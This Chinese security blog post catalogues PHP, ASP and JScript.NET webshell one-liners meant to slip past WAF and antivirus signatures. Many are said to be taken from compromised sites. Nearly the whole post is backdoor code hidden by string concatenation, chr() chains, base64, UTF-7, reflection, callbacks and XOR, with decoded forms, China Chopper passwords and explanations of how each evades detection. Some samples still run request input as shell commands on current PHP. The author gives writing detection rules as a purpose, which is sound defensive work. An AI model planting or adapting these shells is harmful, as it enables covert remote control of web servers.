
WebShell - 贫民窟的艺术家

source link: https://joychou.org/web/webshell.html

WebShell

发布于Jul 14, 2014 | WEB安全 | 阅读26,550次 | 10 评论

Webshell PHP ASP

把之前写的内容全部删了,重新整理了一份 2014 年收集的东西,当时的标题叫做“过狗后门”(指能绕过安全狗等 WAF/查杀工具静态特征的后门,包括一句话木马)。
其中很多后门是在入侵分析时从被攻陷站点保存下来的 Webshell 样本。注意:下面的 PHP 样本大多依赖 PHP 5/7 时代的特性——assert() 把字符串参数当代码执行(PHP 8.0 起不再执行字符串)、preg_replace 的 /e 修饰符(PHP 7.0 移除)、create_function(PHP 8.0 移除)以及 $_POST[x] 这种未加引号的常量写法(PHP 8.0 起直接抛错)——在现代 PHP 上多数已失效,主要价值在于理解免杀思路和编写检测规则。

前几天去参加一个比赛,突发奇想,想记录点什么东西……

Github地址:https://github.com/JoyChou93/webshell

PHP一句话木马

利用数组间接调用函数,数组维数可以任意构造;不管嵌套几层,最终都是 $array[...]['jc'](...) 这一句变量函数调用,等价于 assert($_POST['cmd'])。

<?php 
// Sample: variable-function call through a nested array. The function name
// "assert" is built by concatenation so it never appears as a single token in
// the file. Equivalent to assert($_POST['cmd']); on PHP < 8 assert() evaluates
// a string argument as PHP code, which is what turns this into a backdoor.
$a = 0;
$item['jc'] = 'a'.'s'.'s'.'e'.'r'.'t'; // $item is a one-dimensional array
$array[] = $item; // $array is now a two-dimensional array
$array[$a]['jc']($_POST['cmd']);
?>
<?php 
// Same trick without the concatenation; the POST parameter ("password") is
// "whirlwind", meant for the China Chopper ("菜刀") client.
$item['wind'] = 'assert'; 
$array[] = $item; 
$array[0]['wind']($_POST['whirlwind']);  // password: whirlwind (China Chopper)
?>

利用 key() 取 $_GET 的第一个参数名作为函数名(函数名完全由请求决定,文件里不出现 assert/eval 等关键字)

<?php 
// Sample: the function name is the *name* of the first GET parameter
// (key($_GET)) and the argument comes from POST, e.g. ?assert=1 with
// POST cmd=... yields assert($_POST['cmd']). Nothing in the file itself names
// the function, so keyword signatures do not fire on it.
$lang = (string)key($_GET);  // key() returns the first key name of the array
$lang($_POST['cmd']); 
?>

请求示例:http://localhost/test.php?assert=test(GET 参数名 assert 就是被调用的函数名,参数值无所谓),菜刀密码为 cmd。

<?php 
// Sample: plain variable-function call. $_POST[x] uses the bare word x as a
// constant (a notice on PHP 5/7, a fatal Error on PHP 8.0+).
$a='assert'; // replacing this with $a='eval' fails: eval is a language construct, not a callable function
$a($_POST[x]);
?>
<?php 
// Sample: function names reversed with strrev() and the pattern base64-encoded.
// $a = preg_replace, $b = base64_decode, base64 "L3h4L2Ug" = "/xx/e ".
// The /e modifier evaluates the replacement ($_POST[jc]) as PHP code whenever
// the subject "axxa" matches /xx/. /e was deprecated in PHP 5.5 and removed in 7.0.
 $a=@strrev(ecalper_gerp); 
 $b=@strrev(edoced_46esab);  
 echo @$a($b(L3h4L2Ug),$_POST[jc],axxa); // pattern decodes to /xx/e
?>
<?php 
// Sample: the entire expression "assert($_POST[x])" is assembled from chr()
// calls and handed to assert(), which evaluates it as code (PHP < 8).
assert(chr(97).chr(115).chr(115).chr(101).chr(114).chr(116).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(120).chr(93).chr(41)); // chr() chain decodes to assert($_POST[x]); per the original author the outer assert cannot simply be replaced by eval(chr(97).chr(115)...
?>
<?php
// Sample: preg_replace with /e, every argument built from chr() calls (mixed
// decimal and hex). The decoded form is shown in the next snippet: pattern
// "/duosoft/ise", replacement "@eval('@eval((get_magic_quotes_gpc()?stripslashes($_POST[D8OWX2Y]):$_POST[D8OWX2Y]));');",
// subject "duosoft". The password is the POST field D8OWX2Y; the
// get_magic_quotes_gpc() branch undoes magic-quotes escaping on PHP 5.
preg_replace(chr(47).chr(100).chr(0x75).chr(111).chr(115).chr(111).chr(102).chr(116).chr(0x2f).chr(0x69).chr(115).chr(101),chr(0x40).chr(0x65).chr(0x76).chr(97).chr(0x6c).chr(0x28).chr(0x27).chr(0x40).chr(101).chr(0x76).chr(0x61).chr(0x6c).chr(40).chr(40).chr(0x67).chr(0x65).chr(116).chr(95).chr(0x6d).chr(97).chr(0x67).chr(0x69).chr(0x63).chr(0x5f).chr(113).chr(117).chr(0x6f).chr(0x74).chr(101).chr(115).chr(95).chr(0x67).chr(112).chr(0x63).chr(40).chr(41).chr(0x3f).chr(0x73).chr(0x74).chr(114).chr(0x69).chr(112).chr(115).chr(0x6c).chr(97).chr(0x73).chr(0x68).chr(0x65).chr(0x73).chr(40).chr(36).chr(0x5f).chr(0x50).chr(79).chr(0x53).chr(0x54).chr(91).chr(68).chr(0x38).chr(79).chr(0x57).chr(88).chr(0x32).chr(89).chr(0x5d).chr(41).chr(58).chr(36).chr(95).chr(80).chr(79).chr(0x53).chr(84).chr(0x5b).chr(0x44).chr(0x38).chr(79).chr(87).chr(0x58).chr(0x32).chr(0x59).chr(0x5d).chr(41).chr(41).chr(0x3b).chr(39).chr(0x29).chr(59),chr(0x64).chr(117).chr(111).chr(115).chr(0x6f).chr(102).chr(116));
?>
<?php
// Decoded form of the previous chr() sample, shown for readability only: the
// nested single quotes are not escaped, so this line is not valid PHP as written.
preg_replace('/duosoft/ise', '@eval('@eval((get_magic_quotes_gpc()?stripslashes($_POST[D8OWX2Y]):$_POST[D8OWX2Y]));');', 'duosoft' );
?>
<?php
// Sample: create_function() backdoor. $_uU is "chr"; with it the code string
// "eval($_POST[1]);" and the name "create_function" are spelled out from
// character codes, then create_function("", $code) produces an anonymous
// function that is called immediately. create_function was deprecated in
// PHP 7.2 and removed in 8.0.
// $_uU = "chr"
$_uU=chr(99).chr(104).chr(114);
// $_cC = "eval($_POST[1]);"
$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59);
// $_fF = "create_function"
$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110);
// equivalent to $_=create_function("", 'eval($_POST[1]);');
$_=$_fF("",$_cC);
@$_();?>

解密后:先用 create_function('', 'eval($_POST[1]);') 生成匿名函数再调用,等价于 eval($_POST[1]);(create_function 在 PHP 7.2 废弃、8.0 移除)。


<?php
// Sample: assert() with the argument split across lines and a bare-word key;
// signatures that expect "assert($_POST[" on one line miss it.
assert(
$_POST[x] 
);
?>
<?php
// Same, with the quoted key itself split across lines.
assert(    
$_POST['xx'
] 
);
?>

密码为 cmd(第一个样本把 base64 + gzinflate 压缩后的 eval($_POST[cmd]) 交给 eval 执行;第二个样本用 /*-/*-*/ 注释把关键字切碎,$_ 最终为 assert,下标 0-2-5 = -7,密码为 -7)

<?PHP eVal ( gzinFlate ( base64_dEcode ('Sy1LzNFQiQ/wDw6JVk/OTVGP1bQGAA==') ) );exit;?>
<?php
// Sample: keyword fragments separated by /*-/*-*/ comments. After the comments
// are stripped: $_ = "sser", then $_ = "assert", then
// assert(${"_POST"}[0-2-5]) i.e. assert($_POST[-7]). (The first line above
// uses mixed-case function names: PHP resolves them case-insensitively.)
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]); // password: -7
?>

和正常代码混淆(伪装成参数校验/业务函数、把片段藏在 $_SERVER 变量里、用 0/O、1/l 同形字符命名变量等)

<?php
// Sample: the payload is a base64 string in $sss. CheckSQL() is dressed up as a
// SQL-keyword filter, but $v is never used; all it does is base64-decode its
// by-reference argument. preg_replace with the /e modifier then evaluates
// "@" . $sss as PHP because the subject equals the pattern.
// Decoded payload: if $_REQUEST['pass'] is set, eval(base64_decode($_REQUEST['pass']));
// otherwise eval($_REQUEST['addimg']).
// pwd=addimg
$sss = "ZXZhbChiYXNlNjRfZGVjb2RlKCJhV1lnS0NCcGMzTmxkQ2dnSkY5U1JWRlZSVk5VV3lkd1lYTnpKMTBnS1NsN1FHVjJZV3dvSUdKaGMyVTJORjlrWldOdlpHVW9JQ1JmVWtWUlZVVlRWRnNuY0dGemN5ZGRJQ2tnS1R0OVpXeHpaWHRBWlhaaGJDZ2dKRjlTUlZGVlJWTlVXeWRoWkdScGJXY25YU0FwTzMwPSIpKQ==";
function CheckSQL( &$val ){ 
    $v = "select|update|union|set|where|order|and|or";  // decoy, never used
    $val = base64_decode( $val );
}
CheckSQL( $sss );
preg_replace('/uploadsafe.inc.php/e','@'.$sss, 'uploadsafe.inc.php');
?>
解密后为:if ( isset( $_REQUEST['pass'] )){@eval( base64_decode( $_REQUEST['pass'] ) );}else{@eval( $_REQUEST['addimg'] );} ,即优先执行 base64 编码后的 pass 参数,否则直接 eval addimg 参数。
<?php
// Sample: disguised as a "get client IP" helper. The three $_SERVER writes are
// not real headers (digit 0 in REM0TE_ADDR, digit 1 in CL1ENT_1P); they are
// storage for name fragments and base64 chunks:
//   $get_c1ient_area = "CREATE_" . "FUNCTION"                                   -> create_function
//   $getenv          = "STR_" . "REPLACE"                                       -> str_replace
//   $isset           = str_replace('_SERVER', '', "BASE_SERVER64_") . "DECODE"  -> base64_decode
// PHP function names are case-insensitive, so the upper-case strings resolve.
// The three tails concatenate to "QGV2YWwoJF9QT1NUW2FkbV0pOw==" = "@eval($_POST[adm]);",
// which is echoed into the response (a usable IOC), wrapped in
// create_function('', ...) and called. The final return names a different,
// never-assigned variable ($onlinearea with an "l"), so it returns null.
if (!function_exists('get_c1ient_area')) {
    function get_c1ient_area() {
        $_SERVER['REM0TE_ADDR'] = 'REM0TE_CREATE_QGV2YWwoJF';
        $_SERVER['HTTP_CL1ENT_1P'] = 'STR_9QT1NUW2F';
        $_SERVER['HTTP_X_F0RWARDED_FOR'] = 'BASE_SERVER64_kbV0pOw==';
        $get_c1ient_area = substr($_SERVER['REM0TE_ADDR'], 7, 7) . "FUNCTION";
        $getenv = substr($_SERVER['HTTP_CL1ENT_1P'], 0, 4) . "REPLACE";
        $isset = $getenv('_SERVER', '', substr($_SERVER['HTTP_X_F0RWARDED_FOR'], 0, 14)) . "DECODE";
        // decodes to @eval($_POST[adm]);
        $rea1area = $isset(substr($_SERVER['REM0TE_ADDR'], 14) . substr($_SERVER['HTTP_CL1ENT_1P'], 4) . substr($_SERVER['HTTP_X_F0RWARDED_FOR'], 14));
        echo $rea1area;
        $on1inearea = $get_c1ient_area('', $rea1area);
        $on1inearea();
        return @$onlinearea;
    }
    $on1inearea = get_c1ient_area();
}
?>

解密后为:@eval($_POST[adm]) 。几个变量名用数字 0/1 冒充字母 O/l;另外脚本会 echo 出解码后的载荷,响应里出现 @eval($_POST[adm]); 这一串本身就是可用于检测的特征。

<?php
    # Sample: password-gated preg_replace /e shell. It reads the POST (or
    # REQUEST) fields "pass" and "check"; when the last 6 hex chars of
    # md5(pass) equal "c451cc", the "check" value becomes the /e replacement
    # and is evaluated as PHP. isset($_POST) is always true, so the $_REQUEST
    # branch is dead code. The field names are spelled out with chr() so the
    # strings "pass"/"check" never appear literally.
    # returns the last 6 chars of the 32-char md5 hex digest
    function getMd5($md5 = null) {
        $key = substr(md5($md5),26);
        return $key; 
        } 
        $array = array(
            chr(112).chr(97).chr(115).chr(115), // "pass"
            chr(99).chr(104).chr(101).chr(99).chr(107), // "check"
            chr(99).chr(52).chr(53).chr(49).chr(99).chr(99)    // "c451cc"
        );
        if ( isset($_POST) ){
            $request = &$_POST;
        } 
        
        elseif ( isset($_REQUEST) )  $request = &$_REQUEST;
        
        if ( isset($request[$array[0]]) && isset($request[$array[1]]) ) { 
            if ( getMd5($request[$array[0]]) == $array[2] ) {  // substr(md5(pass), 26) == "c451cc"
                $token = preg_replace (
                chr(47) . $array[2] . chr(47) . chr(101),  //  pattern "/c451cc/e": replacement ($request['check']) is evaluated as PHP
                $request[$array[1]], 
                $array[2]
            );
        }
    }
?>
<?php
// Sample: password-gated /e shell behind a decoy tid/fid "page id" check.
// "pass" and "check" are hidden as hex escapes in the isset() and as
// comma-separated hex in $__PHP_debug (pack('H*') rebuilds them). ZendSalt is
// the md5 of the password: when md5($_POST['pass']) matches it, preg_replace
// with /e evaluates $_POST['check'] as PHP. The evaluated payload is expected
// to define _DEBUG_TOKEN, otherwise the script exits with "Get token fail!".
// The two md5 hex strings are compared with loose ==, and the sample has no
// closing ?> — both as in the original.
$MMIC= $_GET['tid']?$_GET['tid']:$_GET['fid'];
if($MMIC >1000000){
  die('404');
}
if (isset($_POST["\x70\x61\x73\x73"]) && isset($_POST["\x63\x68\x65\x63\x6b"]))
{
  $__PHP_debug   = array (
    'ZendName' => '70,61,73,73', 
    'ZendPort' => '63,68,65,63,6b',
    'ZendSalt' => '792e19812fafd57c7ac150af768d95ce'
  );
 
  $__PHP_replace = array (
    pack('H*', join('', explode(',', $__PHP_debug['ZendName']))),
    pack('H*', join('', explode(',', $__PHP_debug['ZendPort']))),
    $__PHP_debug['ZendSalt']
  );
 
  $__PHP_request = &$_POST;
  $__PHP_token   = md5($__PHP_request[$__PHP_replace[0]]);
 
  if ($__PHP_token == $__PHP_replace[2])
  {
    // pattern "/<md5>/e" on subject <md5>: $_POST['check'] is evaluated as PHP
    $__PHP_token = preg_replace (
      chr(47).$__PHP_token.chr(47).chr(101),
      $__PHP_request[$__PHP_replace[1]],
      $__PHP_token
    );
 
    unset (
      $__PHP_debug,
      $__PHP_replace,
      $__PHP_request,
      $__PHP_token
    );
 
    if(!defined('_DEBUG_TOKEN')) exit ('Get token fail!');
 
  }
}  

PHP反射机制

<?php
    // Sample: the function name and the payload live in a doc comment and are
    // read back at runtime via ReflectionClass::getDocComment(). Fragments are
    // cut out by position: "eva" + "l($_POS" + 'T["c"]);' = eval($_POST["c"]);
    // and "asse" + "rt" = assert. Result: assert('eval($_POST["c"]);').
    // The doc comment below is program data, not documentation — do not edit it.
    /**
    * eva
    * l($_POS
    * T["c"]);
    * asse
    * rt
    */
    class TestClass { }
    $rc = new ReflectionClass('TestClass');
    $str = $rc->getDocComment();
    $payload = substr($str,strpos($str,'ev'),3);
    $payload .= substr($str,strpos($str,'l('),7);
    $payload .= substr($str,strpos($str,'T['),8);
    $exe = substr($str, strpos($str, 'as'), 4);
    $exe .= substr($str, strpos($str, 'rt'), 2);
    
    $exe($payload);
?> 

利用注释和 PHP 的反射机制(ReflectionClass::getDocComment() 可以读回文档注释),按位置从注释里截取片段拼出函数名和载荷,解密后:

assert('eval($_POST["c"]);')  —— 即把字符串 eval($_POST["c"]); 交给 assert 执行,最终等价于 eval($_POST["c"])

利用session_set_save_handler回调函数。

<?php
// Sample: code execution via the session save handler. With ?session=1 the
// script registers "assert" as the *read* callback, sets the session id from
// the phpcms parameter, then starts the session; PHP calls read($sessionId),
// which here is assert($_REQUEST['phpcms']). The other five callbacks are
// empty stubs, and the $_SESSION write at the end has no effect.
error_reporting(0);
if ($_REQUEST['session'] == 1) {
    $session = chr(97) . chr(115) . chr(115) . chr(101) . chr(114) . chr(116); // "assert"
    // open is called first, like a constructor
    function open($save_path, $session_name) {
    }
    // close is called last, like a destructor
    function close() {
    }
    // once the session id is set, starting the session amounts to assert($_REQUEST[phpcms])
    session_id($_REQUEST[phpcms]);
    function write($id, $sess_data) {
    }
    function destroy($id) {
    }
    function gc() {
    }
    // the third argument is the read callback: read(string $sessionId)
    session_set_save_handler("open", "close", $session, "write", "destroy", "gc");
    @session_start(); // opening the session invokes the callbacks automatically
    $cloud = $_SESSION["d"] = "c"; // no effect
}
?>

整个代码逻辑:session_set_save_handler 注册 6 个回调,当 session_start 被调用时,PHP 会用当前 session id 调用第三个回调 read(string $sessionId);这里第三个回调就是 $session,即 assert,所以相当于执行 assert($sessionId)。而前面的 session_id($_REQUEST[phpcms]) 已经把 session id 设成了请求参数,最后就相当于执行
assert($_REQUEST[phpcms])

<?php
// Sample: register_tick_function() with a caller-chosen callback name (e) and
// argument (pass). declare(ticks=1) makes PHP invoke the callback after every
// tickable statement, so the request decides both the function and its
// argument (e.g. e=system). No string evaluation is involved, so this does not
// depend on the assert()/eval() behaviour of older PHP versions.
$e = $_REQUEST['e'];
declare(ticks=1);
register_tick_function($e, $_REQUEST['pass']);
?>

<?php
// Sample: register_shutdown_function() runs $e($_REQUEST['pass']) when the
// script ends; same request-controlled callback as the tick-function sample.
$e = $_REQUEST['e'];
register_shutdown_function($e, $_REQUEST['pass']);
?>
<?php
// Sample: FILTER_CALLBACK hands the value to the 'options' callable, so this is
// assert($_REQUEST['pass']) (the commented array form does the same).
filter_var($_REQUEST['pass'], FILTER_CALLBACK, array('options' => 'assert'));
//filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert')));
?>
<?php
// Sample: array_filter() calls $e on every element, i.e. $e($_POST['pass']).
$e = $_REQUEST['e'];
$arr = array($_POST['pass'],);
array_filter($arr, $e);
?>
// Sample (no <?php tag in the original listing): array_walk_recursive() calls
// $_clasc($value, $key, $userdata) = $_clasc('|.*|e', $_POST['bato'], ''); with
// mod=preg_replace that is preg_replace('|.*|e', $_POST['bato'], ''), so the
// bato parameter is evaluated as PHP (requires /e, i.e. PHP < 7).
$_clasc = $_REQUEST['mod'];
$arr = array($_POST['bato'] => '|.*|e',);
@array_walk_recursive($arr, $_clasc, '');

利用反引号执行命令

<?php 
// Sample: backtick operator (equivalent to shell_exec) with a request-controlled
// command. base64 "dmVy" decodes to "ver"; the stray trailing "=" is ignored by
// the non-strict decoder. The second backtick runs $_GET['username'] verbatim
// as a shell command. No PHP-level evaluation, so this works on any PHP
// version where shell_exec is not disabled.
$cmd =base64_decode('dmVy='); // "ver"
echo `$cmd`. `$_GET[username]`;  // backticks behave like shell_exec() and run the string as a system command
// or
$var = `net user`;
echo "$var";
?>
<?php
// Sample: no letters at all in the source. Function names are built with
// PHP's string increment ("A"++ == "B"): writing an index into an empty
// string turns it into an array, which stringifies to "Array", whose first
// character "A" seeds the alphabet. $_ becomes "BASE64_DECODE" and $__
// becomes "ASSERT" (case-insensitive lookup), so the last line is
// ASSERT(BASE64_DECODE("ZXZhbCgkX1BPU1RbY21kXSk=")) = assert("eval($_POST[cmd])").
// NOTE(review): the $_[+$_]++ step depends on the empty-string-to-array
// conversion that changed in PHP 7.1; confirm the target version before
// relying on this sample.
$num = +"";
$num++; $num++; $num++; $num++;
$four = $num; // 4
$num++; $num++;
$six = $num; // 6
$_="";
$_[+$_]++;  // +"" is 0
$_=$_.""; // $_ is now the string "Array"
$___=$_[+""];// "A"
$____=$___;
$____++;// "B"
$_____=$____;
$_____++;// "C"
$______=$_____;
$______++;// "D"
$_______=$______;
$_______++;// "E"
$________=$_______;
$________++;$________++;$________++;$________++;$________++;$________++;$________++;$________++;$________++;$________++;// "O"
$_________=$________;
$_________++;$_________++;$_________++;$_________++;// "S"
$_=$____.$___.$_________.$_______.$six.$four.'_'.$______.$_______.$_____.$________.$______.$_______;
$________++;$________++;$________++;// "R"
$_____=$_________;
$_____++;// "T"
$__=$___.$_________.$_________.$_______.$________.$_____;
$__($_("ZXZhbCgkX1BPU1RbY21kXSk=")); 
//ASSERT(BASE64_DECODE("ZXZhbCgkX1BPU1RbY21kXSk="));  
//ASSERT(eval($_POST[cmd]));  
?>
<?php
    // Sample: "_POST" is built from XOR of printable characters and the
    // superglobal is reached via variable-variable syntax. The final line is
    // $_POST[0]($_POST[1]) (!$_ is false, which PHP casts to array key 0), so
    // the request supplies both the function name and its argument.
    @$_++; // null++ gives $_ = 1
    $__=("#"^"|"); // "_"
    $__.=("."^"~"); // "_P"
    $__.=("/"^"`"); // "_PO"
    $__.=("|"^"/"); // "_POS"
    $__.=("{"^"/"); // "_POST"
    ${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]);
?>
<?php
// Sample: the function and parameter names are stored as the bitwise NOT of
// their bytes (high/non-printable bytes) and restored with ~ at run time. The
// CJK characters shown here are merely how those raw bytes render; the bytes
// in this listing may not be byte-accurate after copy/paste or re-encoding.
$y = ~"瀸寶崑";    // "assert"
$cmd = ~"暅挌挌洖"; // "jcmemeda"
$y($_REQUEST[$cmd]);
?>

解密后:assert($_REQUEST[jcmemeda])

ASP一句话木马

标准一句话

<% ' Standard ASP one-liners: eval / execute / ExecuteGlobal run whatever string arrives in %>
<% ' the named request parameter (the "password"). request("sb") searches QueryString, Form %>
<% ' and Cookies; request.form / request.item narrow the source. chr(35) is "#". %>
<%eval request("sb")%>

<%execute request("sb")%>

<%Eval(Request(chr(35)))%>   password:#

<%Eval(((Request(chr(35)))))%> 可以有多对括号

<%ExecuteGlobal request("sb")%>

<%eval request.form("#")%>

<%eval request.item("#")%>

<%eval request("chopper")%>

<%execute request("1")%>


// 单独运行500错误,但是菜刀能连。
<% ' The three variants below first copy the parameter into a variable; per the original %>
<% ' notes, the execute / executeglobal forms return HTTP 500 when opened directly but still %>
<% ' work with the China Chopper client, while the eval form opens cleanly. %>
<%a=request("1")%><%execute a%>  

// 单独运行不报错,菜刀能连
<%a=request("1")%><%eval a%>

// 单独运行500错误,但是菜刀能连。
<%a=request("1")%><%executeglobal a%>

利用utf-7编码

密码是 #。在 UTF-7 里 + 和 - 之间的内容按 base64 解码成 UTF-16,像 +k- 这样只有一个 base64 字符的片段凑不出一个完整字符,解码结果为空;所以解密只需把所有 +k- 去掉即可,这里的 k 可以是任意 base64 字符,长度也随意(只要解不出完整字符)。服务器按 codepage 65000 解码后看到的是明文,而按原始字节扫描文件的工具看不到 eval/request 关键字。

<%@codepage=65000%>
<% ' UTF-7 encoded source: each shifted "k" fragment decodes to nothing, so the engine %>
<% ' executes  response.codepage=936:eval request("#")  (shown in plain form below). %>
<%r+k-es+k-p+k-on+k-se.co+k-d+k-e+k-p+k-age=936:e+k-v+k-a+k-l r+k-e+k-q+k-u+k-e+k-s+k-t("#")%>
<%@codepage=65000%>
<%response.codepage=936:eval request("#")%>

密码是:c(UTF-7 中 +ACI- 解码为双引号 ",所以 (+ACI-c+ACI) 就是 ("c"))

<%@codepage=65000%>
<% ' UTF-7 again: the "x" fragments decode to nothing and ACI decodes to a double quote, %>
<% ' leaving  eval(request("c")) . %>
<%e+x-v+x-a+x-l(+x-r+x-e+x-q+x-u+x-e+x-s+x-t+x-(+x-+ACI-c+ACI)+x-)+x-%>  

字符串逆序

StrReverse + Replace 加密:先把字符串逆序,再把 /*/ 替换成双引号,得到 eval request("cmd"),最后交给 Execute 执行。

<%
' decode() reverses its argument and turns the "/*/" marker back into a double quote,
' so the literal below becomes  eval request("cmd") , which Execute then runs.
' The stray "A" after the closing %> is text from the original listing.
Function decode(Code)
    decode=Replace(StrReverse(Code),"/*/","""") 
End Function
Execute decode(")/*/dmc/*/(tseuqer lave")
%> A

ASP自带逆序函数

<% ' strreverse of the literal yields  eval request("xx") , which execute runs. %>
<%execute(strreverse(")""xx""(tseuqer lave"))%>

利用chr ,request

<% ' The chr() chain spells "request"; eval of that string returns the Request object, %>
<% ' which is then called with "1", and the outer eval runs the parameter value. %>
<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("1"))%>

利用asp的&连接符

<% ' The "&"-joined string is  eval(request(0-2-5))  i.e. eval(request(-7)); password -7. %>
<% eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")") %>
<% 
' Same one-liner, with the parameter copied through one or more variables first.
xx=request("xx") 
eval xx 
%> 
<% 
xx=request("xx") 
Rain=xx 
eval Rain 
%>  
<% 
' Dead-branch decoy: 1=0 is never true, so eval bb always runs.
xx=request("xx") 
Rain=xx 
bb=Rain
if 1=0 then
    response.write("123")
else 
    eval bb 
end if
%> 

字符串替换(replace函数)

<% 
' Removing every "0" from the literal leaves  execute(request("xx")) , which eval runs.
xxx="e0x0e0c0ut0e(0req0ue0st(""x0x""))" 
xxx=replace(xxx,"0","") 
eval xxx 
%>

chr()连接字符串

<% ' Same chr() construction of "request" as above; the parameter name is "sz". %>
<%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("sz"))%>

Mid()连接字符串

基本思路:乱序一个字符串然后反复Mid取字符构成一句话。

<% 
' d(s) returns the s-th character of the script-level string love, which is the
' scrambled alphabet  (tqxuesrav l)"  (love is assigned after the function is
' defined but before it is called). The Mid() picks reassemble  eval request("xx") .
Function d(s)
    d=Mid(love,s,1)
End Function
love="(tqxuesrav l)"&""""
execute(d(6)&d(10)&d(9)&d(12)&d(11)&d(8)&d(6)&d(3)&d(5)&d(6)&d(7)&d(2)&d(1)&d(14)&d(4)&d(4)&d(14)&d(13)) 
%>

字符连接成字符串

<% ' Joined string is  eval(request(0-2-5))  = eval(request(-7)). The double-prime (″) glyphs %>
<% ' after 0, 2 and 5 look like mis-encoded double quotes from the original listing. %>
<%eval("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0″&"-"&"2″&"-"&"5″&")"&")")%>   密码-7  

JScript(ASP.NET 页面,Page Language=Jscript)

< %@ Page Language = Jscript %>
<%/* JScript.NET: P is built from "&"-free string pieces separated by comment noise and
     reads  eval(Request[0-2-5],"unsafe") ; eval(P,"unsafe") then executes it, so the
     request parameter -7 is evaluated as code. The "unsafe" second argument is what lets
     JScript.NET eval arbitrary code. The "< %" with a space in the original listing is
     likely an extraction artefact of "<%". */%>
< %var/*-/*-*/P/*-/*-*/=/*-/*-*/"e"+"v"+/*-/*-*/
"a"+"l"+"("+"R"+"e"+/*-/*-*/"q"+"u"+"e"/*-/*-*/+"s"+"t"+
"[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]"+
","+"\""+"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"+"\""+")";eval
(/*-/*-*/P/*-/*-*/,/*-/*-*/"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"/*-/*-*/);%> 密码 -7
<%/* Plain form of the same: parameter name "shezhang". */%>
< %@ Page Language="Jscript"%>< %eval(Request.Item["shezhang"],"unsafe");%>

本文由 JoyChou 创作,采用 知识共享署名4.0 国际许可协议进行许可
本站文章除注明转载/出处外,均为本站原创或翻译,转载前请务必署名
最后编辑时间为: Oct 6, 2017 at 03:08 am

